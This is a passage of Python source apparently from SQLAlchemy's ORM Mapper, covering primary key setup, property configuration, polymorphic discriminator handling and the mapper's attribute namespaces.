        and not self._primary_key_argument
    ):
        # if inheriting, the "primary key" for this mapper is
        # that of the inheriting (unless concrete or explicit)
        self.primary_key = self.inherits.primary_key
    else:
        # determine primary key from argument or mapped_table pks -
        # reduce to the minimal set of columns
        if self._primary_key_argument:
            primary_key = sql_util.reduce_columns(
                [
                    self.mapped_table.corresponding_column(c)
                    for c in self._primary_key_argument
                ],
                ignore_nonexistent_tables=True,
            )
        else:
            primary_key = sql_util.reduce_columns(
                self._pks_by_table[self.mapped_table],
                ignore_nonexistent_tables=True,
            )
        if len(primary_key) == 0:
            raise sa_exc.ArgumentError(
                "Mapper %s could not assemble any primary "
                "key columns for mapped table '%s'"
                % (self, self.mapped_table.description)
            )
        self.primary_key = tuple(primary_key)
        self._log("Identified primary key columns: %s", primary_key)
    # determine cols that aren't expressed within our tables; mark these
    # as "read only" properties which are refreshed upon INSERT/UPDATE
    self._readonly_props = set(
        self._columntoproperty[col]
        for col in self._columntoproperty
        if self._columntoproperty[col] not in self._identity_key_props
        and (
            not hasattr(col, "table")
            or col.table not in self._cols_by_table
        )
    )
def _configure_properties(self):
    """Build the property collections for this mapper from explicit
    ``properties``, inherited properties, and mapped-table columns."""
    # Column and other ClauseElement objects which are mapped
    self.columns = self.c = util.OrderedProperties()
    # object attribute names mapped to MapperProperty objects
    self._props = util.OrderedDict()
    # table columns mapped to lists of MapperProperty objects
    # using a list allows a single column to be defined as
    # populating multiple object attributes
    self._columntoproperty = _ColumnMapping(self)
    # load custom properties
    if self._init_properties:
        for key, prop in self._init_properties.items():
            self._configure_property(key, prop, False)
    # pull properties from the inherited mapper if any.
    if self.inherits:
        for key, prop in self.inherits._props.items():
            if key not in self._props and not self._should_exclude(
                key, key, local=False, column=None
            ):
                self._adapt_inherited_property(key, prop, False)
    # create properties for each column in the mapped table,
    # for those columns which don't already map to a property
    for column in self.mapped_table.columns:
        if column in self._columntoproperty:
            continue
        column_key = (self.column_prefix or "") + column.key
        if self._should_exclude(
            column.key,
            column_key,
            local=self.local_table.c.contains_column(column),
            column=column,
        ):
            continue
        # adjust the "key" used for this column to that
        # of the inheriting mapper
        for mapper in self.iterate_to_root():
            if column in mapper._columntoproperty:
                column_key = mapper._columntoproperty[column].key
        self._configure_property(
            column_key, column, init=False, setparent=True
        )
def _configure_polymorphic_setter(self, init=False):
    """Configure an attribute on the mapper representing the
    'polymorphic_on' column, if applicable, and not
    already generated by _configure_properties (which is typical).

    Also create a setter function which will assign this
    attribute to the value of the 'polymorphic_identity'
    upon instance construction, also if applicable. This
    routine will run when an instance is created.

    :param init: passed through to :meth:`._configure_property` when a
        hidden ColumnProperty must be created for the discriminator.
    """
    setter = False
    if self.polymorphic_on is not None:
        setter = True
        if isinstance(self.polymorphic_on, util.string_types):
            # polymorphic_on specified as a string - link
            # it to mapped ColumnProperty
            try:
                self.polymorphic_on = self._props[self.polymorphic_on]
            except KeyError:
                raise sa_exc.ArgumentError(
                    "Can't determine polymorphic_on "
                    "value '%s' - no attribute is "
                    "mapped to this name." % self.polymorphic_on
                )
        if self.polymorphic_on in self._columntoproperty:
            # polymorphic_on is a column that is already mapped
            # to a ColumnProperty
            prop = self._columntoproperty[self.polymorphic_on]
        elif isinstance(self.polymorphic_on, MapperProperty):
            # polymorphic_on is directly a MapperProperty,
            # ensure it's a ColumnProperty
            if not isinstance(
                self.polymorphic_on, properties.ColumnProperty
            ):
                raise sa_exc.ArgumentError(
                    "Only direct column-mapped "
                    "property or SQL expression "
                    "can be passed for polymorphic_on"
                )
            prop = self.polymorphic_on
        elif not expression._is_column(self.polymorphic_on):
            # polymorphic_on is not a Column and not a ColumnProperty;
            # not supported right now.
            raise sa_exc.ArgumentError(
                "Only direct column-mapped "
                "property or SQL expression "
                "can be passed for polymorphic_on"
            )
        else:
            # polymorphic_on is a Column or SQL expression and
            # doesn't appear to be mapped. this means it can be 1.
            # only present in the with_polymorphic selectable or
            # 2. a totally standalone SQL expression which we'd
            # hope is compatible with this mapper's mapped_table
            col = self.mapped_table.corresponding_column(
                self.polymorphic_on
            )
            if col is None:
                # polymorphic_on doesn't derive from any
                # column/expression isn't present in the mapped
                # table. we will make a "hidden" ColumnProperty
                # for it. Just check that if it's directly a
                # schema.Column and we have with_polymorphic, it's
                # likely a user error if the schema.Column isn't
                # represented somehow in either mapped_table or
                # with_polymorphic. Otherwise as of 0.7.4 we
                # just go with it and assume the user wants it
                # that way (i.e. a CASE statement)
                setter = False
                instrument = False
                col = self.polymorphic_on
                if isinstance(col, schema.Column) and (
                    self.with_polymorphic is None
                    or self.with_polymorphic[1].corresponding_column(col)
                    is None
                ):
                    raise sa_exc.InvalidRequestError(
                        "Could not map polymorphic_on column "
                        "'%s' to the mapped table - polymorphic "
                        "loads will not function properly"
                        % col.description
                    )
            else:
                # column/expression that polymorphic_on derives from
                # is present in our mapped table
                # and is probably mapped, but polymorphic_on itself
                # is not. This happens when
                # the polymorphic_on is only directly present in the
                # with_polymorphic selectable, as when use
                # polymorphic_union.
                # we'll make a separate ColumnProperty for it.
                instrument = True
            key = getattr(col, "key", None)
            if key:
                if self._should_exclude(col.key, col.key, False, col):
                    raise sa_exc.InvalidRequestError(
                        "Cannot exclude or override the "
                        "discriminator column %r" % col.key
                    )
            else:
                # anonymous expression; give it a stable label/key.
                self.polymorphic_on = col = col.label("_sa_polymorphic_on")
                key = col.key
            prop = properties.ColumnProperty(col, _instrument=instrument)
            self._configure_property(key, prop, init=init, setparent=True)
        # the actual polymorphic_on should be the first public-facing
        # column in the property
        self.polymorphic_on = prop.columns[0]
        polymorphic_key = prop.key
    else:
        # no polymorphic_on was set.
        # check inheriting mappers for one.
        for mapper in self.iterate_to_root():
            # determine if polymorphic_on of the parent
            # should be propagated here. If the col
            # is present in our mapped table, or if our mapped
            # table is the same as the parent (i.e. single table
            # inheritance), we can use it
            if mapper.polymorphic_on is not None:
                if self.mapped_table is mapper.mapped_table:
                    self.polymorphic_on = mapper.polymorphic_on
                else:
                    self.polymorphic_on = (
                        self.mapped_table.corresponding_column
                    )(mapper.polymorphic_on)
                # we can use the parent mapper's _set_polymorphic_identity
                # directly; it ensures the polymorphic_identity of the
                # instance's mapper is used so is portable to subclasses.
                if self.polymorphic_on is not None:
                    self._set_polymorphic_identity = (
                        mapper._set_polymorphic_identity
                    )
                    self._validate_polymorphic_identity = (
                        mapper._validate_polymorphic_identity
                    )
                else:
                    self._set_polymorphic_identity = None
                return
    if setter:
        def _set_polymorphic_identity(state):
            # assign this mapper's polymorphic_identity to the
            # discriminator attribute on instance construction.
            dict_ = state.dict
            state.get_impl(polymorphic_key).set(
                state,
                dict_,
                state.manager.mapper.polymorphic_identity,
                None,
            )
        def _validate_polymorphic_identity(mapper, state, dict_):
            # warn at flush time if the discriminator value in the
            # instance isn't legal for this mapper's table.
            if (
                polymorphic_key in dict_
                and dict_[polymorphic_key]
                not in mapper._acceptable_polymorphic_identities
            ):
                util.warn_limited(
                    "Flushing object %s with "
                    "incompatible polymorphic identity %r; the "
                    "object may not refresh and/or load correctly",
                    (state_str(state), dict_[polymorphic_key]),
                )
        self._set_polymorphic_identity = _set_polymorphic_identity
        self._validate_polymorphic_identity = (
            _validate_polymorphic_identity
        )
    else:
        self._set_polymorphic_identity = None
        # NOTE(review): this assigns a *local* name rather than
        # ``self._validate_polymorphic_identity``; presumably a
        # class-level default of None is relied upon -- confirm.
        _validate_polymorphic_identity = None
@_memoized_configured_property
def _version_id_prop(self):
    """The MapperProperty managing ``version_id_col``, or ``None``
    when versioning is not in use."""
    if self.version_id_col is None:
        return None
    return self._columntoproperty[self.version_id_col]
@_memoized_configured_property
def _acceptable_polymorphic_identities(self):
    """Set of polymorphic_identity values acceptable in rows of this
    mapper's mapped table: this mapper's identity plus that of every
    descendant sharing the same ``mapped_table``."""
    identities = set()
    pending = deque([self])
    while pending:
        current = pending.popleft()
        # only mappers selecting from the same table contribute;
        # joined-table descendants have their own mapped_table.
        if current.mapped_table is self.mapped_table:
            identities.add(current.polymorphic_identity)
        pending.extend(current._inheriting_mappers)
    return identities
@_memoized_configured_property
def _prop_set(self):
    # Frozen snapshot of all MapperProperty objects, cached via
    # _memoized_configured_property.
    return frozenset(self._props.values())
def _adapt_inherited_property(self, key, prop, init):
    """Propagate a superclass-mapped property ``prop`` under ``key``
    to this mapper, or install a placeholder for concrete mappers."""
    if not self.concrete:
        self._configure_property(key, prop, init=False, setparent=False)
    elif key not in self._props:
        # determine if the class implements this attribute; if not,
        # or if it is implemented by the attribute that is handling the
        # given superclass-mapped property, then we need to report that we
        # can't use this at the instance level since we are a concrete
        # mapper and we don't map this. don't trip user-defined
        # descriptors that might have side effects when invoked.
        implementing_attribute = self.class_manager._get_class_attr_mro(
            key, prop
        )
        if implementing_attribute is prop or (
            isinstance(
                implementing_attribute, attributes.InstrumentedAttribute
            )
            and implementing_attribute._parententity is prop.parent
        ):
            self._configure_property(
                key,
                properties.ConcreteInheritedProperty(),
                init=init,
                setparent=True,
            )
def _configure_property(self, key, prop, init=True, setparent=True):
    """Add or replace the MapperProperty ``prop`` under attribute name
    ``key``, wiring up column bookkeeping, class instrumentation and
    propagation to inheriting mappers.

    :param key: attribute name on the mapped class.
    :param prop: a MapperProperty, or a Column/expression to be
        coerced via :meth:`._property_from_column`.
    :param init: when True, run ``prop.init()`` and
        ``prop.post_instrument_class()`` immediately.
    :param setparent: when True, set this mapper as the property's
        parent.
    """
    self._log("_configure_property(%s, %s)", key, prop.__class__.__name__)
    if not isinstance(prop, MapperProperty):
        prop = self._property_from_column(key, prop)
    if isinstance(prop, properties.ColumnProperty):
        col = self.mapped_table.corresponding_column(prop.columns[0])
        # if the column is not present in the mapped table,
        # test if a column has been added after the fact to the
        # parent table (or their parent, etc.) [ticket:1570]
        if col is None and self.inherits:
            path = [self]
            for m in self.inherits.iterate_to_root():
                col = m.local_table.corresponding_column(prop.columns[0])
                if col is not None:
                    for m2 in path:
                        m2.mapped_table._reset_exported()
                    col = self.mapped_table.corresponding_column(
                        prop.columns[0]
                    )
                    break
                path.append(m)
        # subquery expression, column not present in the mapped
        # selectable.
        if col is None:
            col = prop.columns[0]
            # column is coming in after _readonly_props was
            # initialized; check for 'readonly'
            if hasattr(self, "_readonly_props") and (
                not hasattr(col, "table")
                or col.table not in self._cols_by_table
            ):
                self._readonly_props.add(prop)
        else:
            # if column is coming in after _cols_by_table was
            # initialized, ensure the col is in the right set
            if (
                hasattr(self, "_cols_by_table")
                and col.table in self._cols_by_table
                and col not in self._cols_by_table[col.table]
            ):
                self._cols_by_table[col.table].add(col)
        # if this properties.ColumnProperty represents the "polymorphic
        # discriminator" column, mark it. We'll need this when rendering
        # columns in SELECT statements.
        if not hasattr(prop, "_is_polymorphic_discriminator"):
            prop._is_polymorphic_discriminator = (
                col is self.polymorphic_on
                or prop.columns[0] is self.polymorphic_on
            )
        self.columns[key] = col
        # register every proxied column under this property. Note the
        # inner loop deliberately rebinds ``col`` to each proxy.
        for col in prop.columns + prop._orig_columns:
            for col in col.proxy_set:
                self._columntoproperty[col] = prop
    prop.key = key
    if setparent:
        prop.set_parent(self, init)
    if key in self._props and getattr(
        self._props[key], "_mapped_by_synonym", False
    ):
        syn = self._props[key]._mapped_by_synonym
        raise sa_exc.ArgumentError(
            "Can't call map_column=True for synonym %r=%r, "
            "a ColumnProperty already exists keyed to the name "
            "%r for column %r" % (syn, key, key, syn)
        )
    # warn when a non-column property silently replaces an existing
    # non-column property under the same key.
    if (
        key in self._props
        and not isinstance(prop, properties.ColumnProperty)
        and not isinstance(
            self._props[key],
            (
                properties.ColumnProperty,
                properties.ConcreteInheritedProperty,
            ),
        )
    ):
        util.warn(
            "Property %s on %s being replaced with new "
            "property %s; the old property will be discarded"
            % (self._props[key], self, prop)
        )
        oldprop = self._props[key]
        self._path_registry.pop(oldprop, None)
    self._props[key] = prop
    if not self.non_primary:
        prop.instrument_class(self)
    # cascade the new property down to mappers that inherit from us.
    for mapper in self._inheriting_mappers:
        mapper._adapt_inherited_property(key, prop, init)
    if init:
        prop.init()
        prop.post_instrument_class(self)
    if self.configured:
        self._expire_memoizations()
def _property_from_column(self, key, prop):
    """generate/update a :class:`.ColumnProperty` given a
    :class:`.Column` object.

    ``prop`` arrives as a Column or list of Columns; the return
    value is the ColumnProperty to be mapped under ``key``.
    """
    # we were passed a Column or a list of Columns;
    # generate a properties.ColumnProperty
    columns = util.to_list(prop)
    column = columns[0]
    if not expression._is_column(column):
        raise sa_exc.ArgumentError(
            "%s=%r is not an instance of MapperProperty or Column"
            % (key, prop)
        )

    # any property already registered under this key drives the decision
    prop = self._props.get(key, None)

    if isinstance(prop, properties.ColumnProperty):
        if (
            (
                not self._inherits_equated_pairs
                or (prop.columns[0], column)
                not in self._inherits_equated_pairs
            )
            and not prop.columns[0].shares_lineage(column)
            and prop.columns[0] is not self.version_id_col
            and column is not self.version_id_col
        ):
            # two unrelated same-named columns are being combined under
            # one attribute; warn, or raise if the existing property
            # belongs to this very mapper (not an inherited one)
            warn_only = prop.parent is not self
            msg = (
                "Implicitly combining column %s with column "
                "%s under attribute '%s'. Please configure one "
                "or more attributes for these same-named columns "
                "explicitly." % (prop.columns[-1], column, key)
            )
            if warn_only:
                util.warn(msg)
            else:
                raise sa_exc.InvalidRequestError(msg)

        # existing properties.ColumnProperty from an inheriting
        # mapper. make a copy and append our column to it
        prop = prop.copy()
        prop.columns.insert(0, column)
        self._log(
            "inserting column to existing list "
            "in properties.ColumnProperty %s" % (key)
        )
        return prop
    elif prop is None or isinstance(
        prop, properties.ConcreteInheritedProperty
    ):
        # no existing property (or only a concrete-inheritance
        # placeholder): build a brand-new ColumnProperty from the
        # columns as located in the mapped selectable
        mapped_column = []
        for c in columns:
            mc = self.mapped_table.corresponding_column(c)
            if mc is None:
                mc = self.local_table.corresponding_column(c)
                if mc is not None:
                    # if the column is in the local table but not the
                    # mapped table, this corresponds to adding a
                    # column after the fact to the local table.
                    # [ticket:1523]
                    self.mapped_table._reset_exported()
                mc = self.mapped_table.corresponding_column(c)
                if mc is None:
                    raise sa_exc.ArgumentError(
                        "When configuring property '%s' on %s, "
                        "column '%s' is not represented in the mapper's "
                        "table. Use the `column_property()` function to "
                        "force this column to be mapped as a read-only "
                        "attribute." % (key, self, c)
                    )
            mapped_column.append(mc)
        return properties.ColumnProperty(*mapped_column)
    else:
        # some other kind of MapperProperty already occupies this key
        raise sa_exc.ArgumentError(
            "WARNING: when configuring property '%s' on %s, "
            "column '%s' conflicts with property '%r'. "
            "To resolve this, map the column to the class under a "
            "different name in the 'properties' dictionary. Or, "
            "to remove all awareness of the column entirely "
            "(including its availability as a foreign key), "
            "use the 'include_properties' or 'exclude_properties' "
            "mapper arguments to control specifically which table "
            "columns get mapped." % (key, self, column.key, prop)
        )
def _post_configure_properties(self):
    """Call the ``init()`` method on all ``MapperProperties``
    attached to this mapper.

    This is a deferred configuration step which is intended
    to execute once all mappers have been constructed.
    """
    self._log("_post_configure_properties() started")

    # snapshot the items, as initialization may mutate _props
    for key, prop in list(self._props.items()):
        self._log("initialize prop %s", key)

        if prop.parent is self and not prop._configure_started:
            prop.init()

        if prop._configure_finished:
            prop.post_instrument_class(self)

    self._log("_post_configure_properties() complete")
    self.configured = True
def add_properties(self, dict_of_properties):
    """Add the given dictionary of properties to this mapper,
    using `add_property`.

    """
    for key in dict_of_properties:
        self.add_property(key, dict_of_properties[key])
def add_property(self, key, prop):
    """Add an individual MapperProperty to this mapper.

    If the mapper has not been configured yet, just adds the
    property to the initial properties dictionary sent to the
    constructor.  If this Mapper has already been configured, then
    the given MapperProperty is configured immediately.

    """
    self._init_properties[key] = prop
    # configure immediately only when mapper configuration already ran
    self._configure_property(key, prop, init=self.configured)
def _expire_memoizations(self):
    # Reset all memoized attributes on this mapper and on every
    # mapper up its inheritance chain.
    for ancestor in self.iterate_to_root():
        _memoized_configured_property.expire_instance(ancestor)
@property
def _log_desc(self):
    """Short description used as a prefix on log messages."""
    # preserve the legacy and/or semantics: fall back to str() when
    # local_table is None *or* its description is falsy
    if self.local_table is not None and self.local_table.description:
        table_desc = self.local_table.description
    else:
        table_desc = str(self.local_table)
    suffix = "|non-primary" if self.non_primary else ""
    return "(" + self.class_.__name__ + "|" + table_desc + suffix + ")"
def _log(self, msg, *args):
    # info-level log, prefixed with this mapper's description
    self.logger.info("%s " + msg, self._log_desc, *args)
def _log_debug(self, msg, *args):
    # debug-level log, prefixed with this mapper's description
    self.logger.debug("%s " + msg, self._log_desc, *args)
def __repr__(self):
    """Unambiguous repr including object id and mapped class name."""
    mapped_name = self.class_.__name__
    return "<Mapper at 0x%x; %s>" % (id(self), mapped_name)
def __str__(self):
    """Readable description: class name, table description, primary-ness."""
    # preserve legacy and/or semantics: the middle segment renders as
    # "None" when local_table is None or its description is falsy
    if self.local_table is not None and self.local_table.description:
        table_part = self.local_table.description
    else:
        table_part = None
    suffix = "|non-primary" if self.non_primary else ""
    return "Mapper|%s|%s%s" % (self.class_.__name__, table_part, suffix)
def _is_orphan(self, state):
    """Determine whether the given state is an "orphan" per the
    delete-orphan rules of this mapper hierarchy."""
    saw_orphan_rule = False
    legacy = self.legacy_is_orphan
    for mapper in self.iterate_to_root():
        for key, cls in mapper._delete_orphans:
            saw_orphan_rule = True
            has_parent = attributes.manager_of_class(cls).has_parent(
                state, key, optimistic=state.has_identity
            )
            # legacy mode: any parent present -> not an orphan;
            # modern mode: any parent missing -> orphan
            if legacy:
                if has_parent:
                    return False
            elif not has_parent:
                return True
    return saw_orphan_rule if legacy else False
def has_property(self, key):
    """Return True if this mapper has a MapperProperty keyed to ``key``."""
    return key in self._props
def get_property(self, key, _configure_mappers=True):
    """return a MapperProperty associated with the given key.
    """
    if _configure_mappers and Mapper._new_mappers:
        configure_mappers()

    if key not in self._props:
        raise sa_exc.InvalidRequestError(
            "Mapper '%s' has no property '%s'" % (self, key)
        )
    return self._props[key]
def get_property_by_column(self, column):
    """Given a :class:`.Column` object, return the
    :class:`.MapperProperty` which maps this column."""
    # raises KeyError if the column is not mapped by this mapper
    return self._columntoproperty[column]
@property
def iterate_properties(self):
    """return an iterator of all MapperProperty objects."""
    # ensure pending mappers are fully configured before exposing props
    if Mapper._new_mappers:
        configure_mappers()
    return iter(self._props.values())
def _mappers_from_spec(self, spec, selectable):
    """given a with_polymorphic() argument, return the set of mappers it
    represents.

    Trims the list of mappers to just those represented within the given
    selectable, if present. This helps some more legacy-ish mappings.
    """
    if spec == "*":
        # "*" means this mapper plus all of its descendants
        mappers = list(self.self_and_descendants)
    elif spec:
        mappers = set()
        for m in util.to_list(spec):
            m = _class_to_mapper(m)
            if not m.isa(self):
                raise sa_exc.InvalidRequestError(
                    "%r does not inherit from %r" % (m, self)
                )

            if selectable is None:
                # no explicit selectable: include intermediate
                # superclass mappers so the join can be constructed
                mappers.update(m.iterate_to_root())
            else:
                mappers.add(m)

        # re-order to match self_and_descendants ordering
        mappers = [m for m in self.self_and_descendants if m in mappers]
    else:
        mappers = []

    if selectable is not None:
        # trim to mappers whose local table appears in the selectable
        tables = set(
            sql_util.find_tables(selectable, include_aliases=True)
        )
        mappers = [m for m in mappers if m.local_table in tables]
    return mappers
def _selectable_from_mappers(self, mappers, innerjoin):
    """given a list of mappers (assumed to be within this mapper's
    inheritance hierarchy), construct an outerjoin amongst those mapper's
    mapped tables.

    """
    from_obj = self.mapped_table
    for m in mappers:
        if m is self:
            continue
        if m.concrete:
            raise sa_exc.InvalidRequestError(
                "'with_polymorphic()' requires 'selectable' argument "
                "when concrete-inheriting mappers are used."
            )
        elif not m.single:
            # chain each subclass table onto the join, inner or outer
            join_to = from_obj.join if innerjoin else from_obj.outerjoin
            from_obj = join_to(m.local_table, m.inherit_condition)

    return from_obj
@_memoized_configured_property
def _single_table_criterion(self):
    """WHERE criterion limiting a single-table-inheritance subclass
    to its own polymorphic identities, or None if not applicable."""
    if not (
        self.single and self.inherits and self.polymorphic_on is not None
    ):
        return None
    return self.polymorphic_on.in_(
        m.polymorphic_identity for m in self.self_and_descendants
    )
@_memoized_configured_property
def _with_polymorphic_mappers(self):
    """Mappers included in the default polymorphic load, per the
    configured ``with_polymorphic`` setting."""
    if Mapper._new_mappers:
        configure_mappers()
    if self.with_polymorphic:
        return self._mappers_from_spec(*self.with_polymorphic)
    return []
@_memoized_configured_property
def _with_polymorphic_selectable(self):
    """Selectable used for polymorphic loads: the explicit selectable
    if one was configured, otherwise a join built from the mappers."""
    if not self.with_polymorphic:
        return self.mapped_table

    spec, selectable = self.with_polymorphic
    if selectable is None:
        # no explicit selectable; build the (outer)join ourselves
        return self._selectable_from_mappers(
            self._mappers_from_spec(spec, selectable), False
        )
    return selectable
with_polymorphic_mappers = _with_polymorphic_mappers
"""The list of :class:`.Mapper` objects included in the
default "polymorphic" query.
"""
@_memoized_configured_property
def _insert_cols_evaluating_none(self):
    """Per-table frozensets of columns whose types explicitly
    evaluate None on INSERT."""
    result = {}
    for table, columns in self._cols_by_table.items():
        result[table] = frozenset(
            c for c in columns if c.type.should_evaluate_none
        )
    return result
@_memoized_configured_property
def _insert_cols_as_none(self):
    """Per-table frozensets of column keys that render as NULL on
    INSERT when no value is supplied."""

    def _renders_none(c):
        # not a PK, no default of any kind, and the type does not
        # evaluate None explicitly
        return (
            not c.primary_key
            and not c.server_default
            and not c.default
            and not c.type.should_evaluate_none
        )

    return {
        table: frozenset(c.key for c in columns if _renders_none(c))
        for table, columns in self._cols_by_table.items()
    }
@_memoized_configured_property
def _propkey_to_col(self):
    """Per-table mapping of property key name to Column."""
    return {
        table: {self._columntoproperty[c].key: c for c in columns}
        for table, columns in self._cols_by_table.items()
    }
@_memoized_configured_property
def _pk_keys_by_table(self):
    """Per-table frozensets of primary key column ``.key`` names."""
    return {
        table: frozenset(c.key for c in pks)
        for table, pks in self._pks_by_table.items()
    }
@_memoized_configured_property
def _pk_attr_keys_by_table(self):
    """Per-table frozensets of mapped attribute names for the
    primary key columns."""
    return {
        table: frozenset(self._columntoproperty[c].key for c in pks)
        for table, pks in self._pks_by_table.items()
    }
@_memoized_configured_property
def _server_default_cols(self):
    """Per-table frozensets of column keys that carry a
    server-side default."""
    return {
        table: frozenset(
            c.key for c in columns if c.server_default is not None
        )
        for table, columns in self._cols_by_table.items()
    }
@_memoized_configured_property
def _server_default_plus_onupdate_propkeys(self):
    """Attribute keys of mapped columns that have either a
    server_default or a server_onupdate."""
    propkeys = set()
    for columns in self._cols_by_table.values():
        for col in columns:
            has_server_value = (
                col.server_default is not None
                or col.server_onupdate is not None
            )
            if has_server_value and col in self._columntoproperty:
                propkeys.add(self._columntoproperty[col].key)
    return propkeys
@_memoized_configured_property
def _server_onupdate_default_cols(self):
    """Per-table frozensets of column keys that carry a
    server-side onupdate default."""
    return {
        table: frozenset(
            c.key for c in columns if c.server_onupdate is not None
        )
        for table, columns in self._cols_by_table.items()
    }
@property
def selectable(self):
    """The :func:`.select` construct this :class:`.Mapper` selects from
    by default.

    Normally, this is equivalent to :attr:`.mapped_table`, unless
    the ``with_polymorphic`` feature is in use, in which case the
    full "polymorphic" selectable is returned.

    """
    return self._with_polymorphic_selectable
def _with_polymorphic_args(
    self, spec=None, selectable=False, innerjoin=False
):
    # Resolve (mappers, selectable) for a polymorphic load, falling
    # back to this mapper's configured with_polymorphic setting.
    # NOTE: ``selectable=False`` is a sentinel meaning "not given";
    # None is meaningful and means "build the join from the mappers".
    if self.with_polymorphic:
        if not spec:
            spec = self.with_polymorphic[0]
        if selectable is False:
            selectable = self.with_polymorphic[1]
    elif selectable is False:
        selectable = None
    mappers = self._mappers_from_spec(spec, selectable)
    if selectable is not None:
        return mappers, selectable
    else:
        return mappers, self._selectable_from_mappers(mappers, innerjoin)
@_memoized_configured_property
def _polymorphic_properties(self):
    """Materialized list of the properties rendered for
    polymorphic loads."""
    polymorphic_mappers = self._with_polymorphic_mappers
    return list(
        self._iterate_polymorphic_properties(polymorphic_mappers)
    )
def _iterate_polymorphic_properties(self, mappers=None):
    """Return an iterator of MapperProperty objects which will render into
    a SELECT."""
    if mappers is None:
        mappers = self._with_polymorphic_mappers

    if not mappers:
        for prop in self.iterate_properties:
            yield prop
        return

    # in the polymorphic case, filter out discriminator columns
    # from other mappers, as these are sometimes dependent on that
    # mapper's polymorphic selectable (which we don't want rendered)
    all_props = chain(
        *[list(m.iterate_properties) for m in [self] + mappers]
    )
    for prop in util.unique_list(all_props):
        is_foreign_discriminator = getattr(
            prop, "_is_polymorphic_discriminator", False
        ) and (
            self.polymorphic_on is None
            or prop.columns[0] is not self.polymorphic_on
        )
        if is_foreign_discriminator:
            continue
        yield prop
@_memoized_configured_property
def attrs(self):
    """A namespace of all :class:`.MapperProperty` objects
    associated this mapper.

    This is an object that provides each property based on
    its key name.  For instance, the mapper for a
    ``User`` class which has ``User.name`` attribute would
    provide ``mapper.attrs.name``, which would be the
    :class:`.ColumnProperty` representing the ``name``
    column.   The namespace object can also be iterated,
    which would yield each :class:`.MapperProperty`.

    :class:`.Mapper` has several pre-filtered views
    of this attribute which limit the types of properties
    returned, including :attr:`.synonyms`, :attr:`.column_attrs`,
    :attr:`.relationships`, and :attr:`.composites`.

    .. warning::

        The :attr:`.Mapper.attrs` accessor namespace is an
        instance of :class:`.OrderedProperties`.  This is
        a dictionary-like object which includes a small number of
        named methods such as :meth:`.OrderedProperties.items`
        and :meth:`.OrderedProperties.values`.  When
        accessing attributes dynamically, favor using the dict-access
        scheme, e.g. ``mapper.attrs[somename]`` over
        ``getattr(mapper.attrs, somename)`` to avoid name collisions.

    .. seealso::

        :attr:`.Mapper.all_orm_descriptors`

    """
    # ensure pending mappers are fully configured before exposing props
    if Mapper._new_mappers:
        configure_mappers()
    return util.ImmutableProperties(self._props)
@_memoized_configured_property
def all_orm_descriptors(self):
    """A namespace of all :class:`.InspectionAttr` attributes associated
    with the mapped class.

    These attributes are in all cases Python :term:`descriptors`
    associated with the mapped class or its superclasses.

    This namespace includes attributes that are mapped to the class
    as well as attributes declared by extension modules.
    It includes any Python descriptor type that inherits from
    :class:`.InspectionAttr`.  This includes
    :class:`.QueryableAttribute`, as well as extension types such as
    :class:`.hybrid_property`, :class:`.hybrid_method` and
    :class:`.AssociationProxy`.

    To distinguish between mapped attributes and extension attributes,
    the attribute :attr:`.InspectionAttr.extension_type` will refer
    to a constant that distinguishes between different extension types.

    When dealing with a :class:`.QueryableAttribute`, the
    :attr:`.QueryableAttribute.property` attribute refers to the
    :class:`.MapperProperty` property, which is what you get when
    referring to the collection of mapped properties via
    :attr:`.Mapper.attrs`.

    .. warning::

        The :attr:`.Mapper.all_orm_descriptors` accessor namespace is an
        instance of :class:`.OrderedProperties`.  This is
        a dictionary-like object which includes a small number of
        named methods such as :meth:`.OrderedProperties.items`
        and :meth:`.OrderedProperties.values`.  When
        accessing attributes dynamically, favor using the dict-access
        scheme, e.g. ``mapper.all_orm_descriptors[somename]`` over
        ``getattr(mapper.all_orm_descriptors, somename)`` to avoid name
        collisions.

    .. versionadded:: 0.8.0

    .. seealso::

        :attr:`.Mapper.attrs`

    """
    # delegate to the class manager, which tracks all InspectionAttr
    # descriptors found on the class and its superclasses
    return util.ImmutableProperties(
        dict(self.class_manager._all_sqla_attributes())
    )
@_memoized_configured_property
def synonyms(self):
    """Return a namespace of all :class:`.SynonymProperty`
    properties maintained by this :class:`.Mapper`.

    .. seealso::

        :attr:`.Mapper.attrs` - namespace of all :class:`.MapperProperty`
        objects.

    """
    return self._filter_properties(properties.SynonymProperty)
@_memoized_configured_property
def column_attrs(self):
    """Return a namespace of all :class:`.ColumnProperty`
    properties maintained by this :class:`.Mapper`.

    .. seealso::

        :attr:`.Mapper.attrs` - namespace of all :class:`.MapperProperty`
        objects.

    """
    return self._filter_properties(properties.ColumnProperty)
@_memoized_configured_property
def relationships(self):
    """A namespace of all :class:`.RelationshipProperty` properties
    maintained by this :class:`.Mapper`.

    .. warning::

        the :attr:`.Mapper.relationships` accessor namespace is an
        instance of :class:`.OrderedProperties`.  This is
        a dictionary-like object which includes a small number of
        named methods such as :meth:`.OrderedProperties.items`
        and :meth:`.OrderedProperties.values`.  When
        accessing attributes dynamically, favor using the dict-access
        scheme, e.g. ``mapper.relationships[somename]`` over
        ``getattr(mapper.relationships, somename)`` to avoid name
        collisions.

    .. seealso::

        :attr:`.Mapper.attrs` - namespace of all :class:`.MapperProperty`
        objects.

    """
    return self._filter_properties(properties.RelationshipProperty)
@_memoized_configured_property
def composites(self):
    """Return a namespace of all :class:`.CompositeProperty`
    properties maintained by this :class:`.Mapper`.

    .. seealso::

        :attr:`.Mapper.attrs` - namespace of all :class:`.MapperProperty`
        objects.

    """
    return self._filter_properties(properties.CompositeProperty)
def _filter_properties(self, type_):
    """Return an ImmutableProperties namespace containing only the
    MapperProperty objects of the given type."""
    if Mapper._new_mappers:
        configure_mappers()
    matched = util.OrderedDict()
    for key, value in self._props.items():
        if isinstance(value, type_):
            matched[key] = value
    return util.ImmutableProperties(matched)
@_memoized_configured_property
def _get_clause(self):
    """create a "get clause" based on the primary key.  this is used
    by query.get() and many-to-one lazyloads to load this item
    by primary key.

    """
    params = []
    for pk_col in self.primary_key:
        params.append((pk_col, sql.bindparam(None, type_=pk_col.type)))
    criteria = [col == bind for col, bind in params]
    return (sql.and_(*criteria), util.column_dict(params))
@_memoized_configured_property
def _equivalent_columns(self):
    """Create a map of all equivalent columns, based on
    the determination of column pairs that are equated to
    one another based on inherit condition.  This is designed
    to work with the queries that util.polymorphic_union
    comes up with, which often don't include the columns from
    the base table directly (including the subclass table columns
    only).

    The resulting structure is a dictionary of columns mapped
    to lists of equivalent columns, e.g.::

        {
            tablea.col1:
                {tableb.col1, tablec.col1},
            tablea.col2:
